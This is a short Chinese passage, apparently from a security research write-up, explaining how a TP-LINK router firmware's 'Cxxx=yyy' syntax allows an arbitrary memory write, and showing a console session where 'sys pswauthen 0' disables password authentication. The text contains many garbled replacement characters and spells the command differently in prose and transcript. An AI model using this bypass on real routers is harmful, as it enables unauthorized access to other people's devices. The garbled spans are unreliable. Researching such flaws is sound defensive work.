令人興奮的是����,這正是[2]中所提及的代碼。在ROM:8010E5F0中�����,看起來(lái)Cxxx=yyy語(yǔ)法會(huì)被解釋成xxx乘以0×28再將結(jié)果加上ROM:8010E5F8中所示的基址��,然后使用這個(gè)新地址作為目的地址復(fù)制yyy的值(ROM:8010E608)�����。因此�,這可以讓我們實(shí)現(xiàn)任意寫。從另外一方面來(lái)說(shuō)�����,這有可能能讓我們以”sys pwauthen 0”的形式”解鎖”路由�,如下所示:
cawan$curl 192.168.1.1
ProtectedObject ProtectedObject
Username or Password error
TP-LINK>sys pswauthen 0
Do notneed password authentication for configuration!
TP-LINK>
cawan$curl 192.168.1.1
